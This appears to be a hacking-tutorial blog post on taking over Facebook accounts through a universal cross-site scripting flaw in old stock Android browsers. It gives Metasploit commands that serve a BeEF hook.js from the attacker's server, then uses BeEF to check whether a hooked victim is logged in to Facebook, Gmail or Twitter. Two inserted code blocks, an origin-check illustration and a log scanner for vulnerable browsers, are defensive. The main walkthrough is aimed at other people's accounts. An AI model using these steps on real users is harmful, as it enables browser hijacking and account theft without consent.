This is the initial post of a new series on how to hack Facebook.
It's important to note here that each hack I'll be covering is very
specific. I have said it before, but I feel I need to repeat it again:
there is NO SILVER BULLET that works under all circumstances. Obviously,
the good folks at Facebook have taken precautions to make certain that
their app is not hacked, but if we are creative, persistent, and
ingenious, we can still get in.
Facebook is one of the most secure applications on the Internet and, despite
what you might read on the Internet, it is NOT easy to hack. In
addition, most of those websites on the Internet willing to sell you a
Facebook hack are scams. Don't give them a penny!
If you want to hack Facebook, you need to invest some time into learning. If you are new to hacking, you might want to start with my article "How to Use Null Byte to Study to Become a Professional Hacker."
In addition, I want to put in a word about what we mean by the word "hack." In some cases, we might get the password which, of course, will give us full access to the Facebook account. In other cases, we might just get access to the account without any rights. In still other schemes, we might get the cookies that Facebook places in the user's browser and then place them in our browser for access to the account whenever we please. In yet another scenario, we can place ourselves between the user and Facebook in a form of MitM attack to get the password, etc.
In this first entry in this series,
we will use a flaw in the stock Android web browser that will provide
us with access to the Facebook account. I hope it goes without saying
that this hack will only work when the user has accessed their Facebook
account from the stock Android browser, not the Facebook mobile app.
Although Google is aware of this security flaw in their browser, it is
not automatically patched or replaced on existing systems. As a result,
this hack will work on most Android systems.
Same Origin Policy
The same-origin policy (SOP) is one of the key security measures that every browser should enforce. What it means is that browsers are designed so that code in one webpage can't access content that is not part of its own origin. This prevents attackers from injecting code into a site without the authorization of the website owner.
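The check the SOP calls for, as an added example (not part of the original article): two URLs share an origin only when scheme, host, and port all match. The function names are this example's own, and the first pair of URLs is the attacker page and Facebook from this article's scenario.

```javascript
// Default ports, applied when a URL omits the port.
const DEFAULT_PORTS = new Map([['http:', '80'], ['https:', '443']]);

// Origin as a [scheme, host, port] tuple. URLs with an opaque origin
// (such as data:) yield null: they are same-origin with nothing.
function originTuple(rawUrl) {
  const u = new URL(rawUrl);
  if (!DEFAULT_PORTS.has(u.protocol)) return null;
  return [u.protocol, u.hostname, u.port || DEFAULT_PORTS.get(u.protocol)];
}

function isSameOrigin(a, b) {
  const oa = originTuple(a);
  const ob = originTuple(b);
  if (oa === null || ob === null) return false;
  return oa.every((part, i) => part === ob[i]);
}

// Decision an SOP-enforcing browser makes when script running in
// scriptPage tries to read the DOM or cookies of targetPage.
function checkAccess(scriptPage, targetPage) {
  return isSameOrigin(scriptPage, targetPage) ? 'allow' : 'block';
}

// Constructed test cases; the first pair is the scenario from the article.
const attempts = [
  ['http://192.168.1.107:8080/', 'https://www.facebook.com/'],
  ['https://www.facebook.com/a', 'https://www.facebook.com:443/b'],
  ['http://example.com/', 'https://example.com/'],
  ['https://www.facebook.com/', 'https://m.facebook.com/'],
  ['data:text/html,hi', 'data:text/html,hi'],
];
for (const [from, to] of attempts) {
  console.log(`${checkAccess(from, to).padEnd(5)} ${from} -> ${to}`);
}
```

Only the second pair is allowed: an explicit default port does not change the origin, while a different scheme, a different subdomain, or an opaque origin does.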
Unfortunately, the default Android browser can be
hacked as it does not enforce the SOP adequately. In this way, an
attacker can access the user's other pages that are open in the
browser, among other things. This means that if we can get the user to
navigate to our website and then send them some malicious code, we can
then access other sites that are open in their browser, such as
Facebook.
For those of you who are new to Null Byte and hacking, I recommend that you start by installing Kali Linux. In this hack, we will need two tools, Metasploit and BeEF, both of which are built into our Kali Linux system.
Step 1: Open Metasploit
Let's begin by firing up Kali and then opening Metasploit by typing:
kali > msfconsole
You should get a screen like this.
For those of you unfamiliar with Metasploit, check out my series on using Metasploit for more information on using it successfully.
Step 2: Find the Exploit
Next, let's find the exploit for this hack by typing:
msf > search platform:android stock browser
When we do so, we get only one module:
auxiliary/gather/android_stock_browser_uxss
Let's load that module by typing:
msf > use auxiliary/gather/android_stock_browser_uxss
Step 3: Get the Info
Now that we have loaded the module, let's get some information on this module. We can do this by typing:
msf > info
As you can see from this info page, this exploit works against all stock
Android browsers before Android 4.4 KitKat. It tells us that this module
allows us to run arbitrary JavaScript in the context of the URL.
Step 4: Show Options
Next, let's see what options we need to set for this module to function. Most importantly, we need to set the REMOTE_JS that I have highlighted below.
Step 5: Open BeEF
Now, open BeEF. Please take a look at this tutorial on using BeEF if you are unfamiliar with the tool.
Step 6: Set JS to BeEF Hook
Back to Metasploit now. We need to set the REMOTE_JS to the hook on BeEF. Of course, make certain you use the IP of the server that BeEF is running on.
msf > set REMOTE_JS http://192.168.1.107:3000/hook.js
Next, we need to set the URIPATH to the root directory /. Let's type:
msf > set uripath /
Step 7: Run the Server
Now we need to start the Metasploit web server. What will happen now is that Metasploit will start its web server and serve up the BeEF hook so that when anyone navigates to that website, it will have their browser hooked to BeEF.
msf > run
Step 8: Navigate to the Website from an Android Browser
Now we are replicating the behavior of the victim. When they navigate to
the website hosting the hook, it will automatically inject the
JavaScript into their browser and hook it. So, we need to use the stock
browser on an Android device and go to 192.168.1.107:8080, or whatever
the IP is of your website.
Step 9: Hook Browser
When the user/device visits our web server at 192.168.1.107, the BeEF
JavaScript will hook their browser. It will show under the "Hooked
Browser" explorer in BeEF. We now control their browser!
Step 10: Detect if the Browser Is Authenticated to Facebook
Now let's go back to BeEF and go to the "Commands" tab. Under the "Network"
folder we find the "Detect Social Networks" command. This command will
check to see whether the victim is authenticated to Gmail, Facebook, or
Twitter. Click on the "Execute" button in the lower right.
When we do so, BeEF will return the results to us. As you can see below, BeEF reported that this particular user was not authenticated to Gmail or Facebook, but was authenticated to Twitter.
Now, we need to simply wait until the user is authenticated to Facebook and
attempt this command again. Once they have authenticated to Facebook, we
can direct a tab to open the user's Facebook page, which we will do in
our next Facebook hack tutorial.
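From the defender's side, Step 3's info page gives a usable signal: the flaw affects stock Android browsers before 4.4 KitKat. The following added example (not from the original article) scans web server access logs for such clients so a site can warn those users or require re-authentication; the User-Agent heuristic and the log lines are constructed for illustration, and User-Agent strings can be spoofed.

```javascript
// Heuristic (an assumption of this example): the stock browser reports
// "Android <version>", AppleWebKit and a Version/ token, with no
// Chrome, Opera or Firefox token.
function isVulnerableStockBrowser(ua) {
  const m = /Android (\d+)(?:\.(\d+))?/.exec(ua);
  if (!m) return false;
  const major = Number(m[1]);
  const minor = Number(m[2] || 0);
  const before44 = major < 4 || (major === 4 && minor < 4);
  const looksStock = /AppleWebKit\//.test(ua) && /Version\/\d/.test(ua) &&
    !/(Chrome|OPR|Firefox)\//.test(ua);
  return before44 && looksStock;
}

// Combined Log Format: ip - user [time] "request" status bytes "referer" "ua"
const LOG_RE =
  /^(\S+) \S+ \S+ \[[^\]]+\] "(?:\S+) (\S+)[^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$/;

// Return the client IP and path of every request from an affected browser.
function flagRequests(lines) {
  const flagged = [];
  for (const line of lines) {
    const m = LOG_RE.exec(line);
    if (m && isVulnerableStockBrowser(m[3])) {
      flagged.push({ ip: m[1], path: m[2] });
    }
  }
  return flagged;
}

// Constructed sample log lines (documentation IP ranges).
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2014:13:55:36 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; GT-I9300 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"',
  '203.0.113.9 - - [10/Oct/2014:13:56:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Linux; Android 4.4.2; Nexus 5 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36"',
  '203.0.113.12 - - [10/Oct/2014:13:56:40 +0000] "GET /home HTTP/1.1" 200 900 "-" "Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19"',
  '198.51.100.7 - - [10/Oct/2014:13:57:12 +0000] "GET /home HTTP/1.1" 200 900 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0"',
  '198.51.100.23 - - [10/Oct/2014:13:58:03 +0000] "GET /account HTTP/1.1" 200 733 "-" "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"',
];
console.log(flagRequests(SAMPLE_LOG));
```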
We will continue to explore more ways to hack Facebook, Twitter, and Gmail
in future articles, so keep coming back, my budding hackers!